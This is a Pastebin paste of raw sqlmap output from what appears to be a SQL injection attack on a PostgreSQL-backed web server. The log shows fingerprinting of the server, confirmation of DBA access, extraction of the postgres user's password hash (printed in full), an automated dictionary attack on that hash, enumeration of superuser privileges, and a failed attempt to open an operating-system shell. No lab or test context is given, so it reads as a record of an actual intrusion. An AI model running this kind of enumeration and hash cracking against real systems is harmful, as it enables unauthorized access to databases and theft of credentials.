Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- web server operating system: Linux Ubuntu
- web application technology: Nginx 1.15.5
- back-end DBMS operating system: Linux Ubuntu
- back-end DBMS: PostgreSQL
- banner: 'PostgreSQL 10.8 (Ubuntu 10.8-0ubuntu0.18.10.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 8.2.0-7ubuntu1) 8.2.0, 64-bit'
- [08:13:25] [INFO] testing if current user is DBA
- current user is DBA: True
- [08:13:25] [INFO] fetching database users
- [08:13:25] [INFO] used SQL query returns 1 entry
- [08:13:25] [INFO] resumed: 'postgres'
- database management system users [1]:
- [*] postgres
- [08:13:25] [INFO] fetching database users password hashes
- [08:13:25] [INFO] used SQL query returns 1 entry
- [08:13:25] [INFO] resumed: 'postgres'
- [08:13:25] [INFO] resumed: 'md5b2b980c5a4a07939e5e8d0a4fd5cbe41'
- do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
- do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
- [08:13:36] [INFO] using hash method 'postgres_passwd'
- what dictionary do you want to use?
- [1] default dictionary file '/home/achonk/sqlmap/txt/wordlist.zip' (press Enter)
- [2] custom dictionary file
- [3] file with list of dictionary files
- >
- [08:13:37] [INFO] using default dictionary
- do you want to use common password suffixes? (slow!) [y/N]
- [08:13:37] [INFO] starting dictionary-based cracking (postgres_passwd)
- [08:13:37] [INFO] starting 2 processes
- [08:14:43] [WARNING] no clear password(s) found
- database management system users password hashes:
- [*] postgres [1]:
- password hash: md5b2b980c5a4a07939e5e8d0a4fd5cbe41
- [08:14:43] [INFO] fetching database users privileges
- [08:14:43] [INFO] used SQL query returns 1 entry
- [08:14:43] [INFO] resumed: 'postgres'
- [08:14:43] [INFO] resumed: '1'
- [08:14:43] [INFO] resumed: '1'
- [08:14:44] [WARNING] reflective value(s) found and filtering out
- database management system users privileges:
- [*] postgres (administrator) [2]:
- privilege: createdb
- privilege: super
- [08:14:44] [WARNING] on PostgreSQL the concept of roles does not exist. sqlmap will enumerate privileges instead
- [08:14:44] [INFO] fetching database users privileges
- database management system users roles:
- [*] postgres (administrator) [2]:
- role: createdb
- role: super
- [08:14:44] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported
- [08:14:44] [WARNING] HTTP error codes detected during run:
- [*] ending @ 08:14:44 /2019-05-21/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement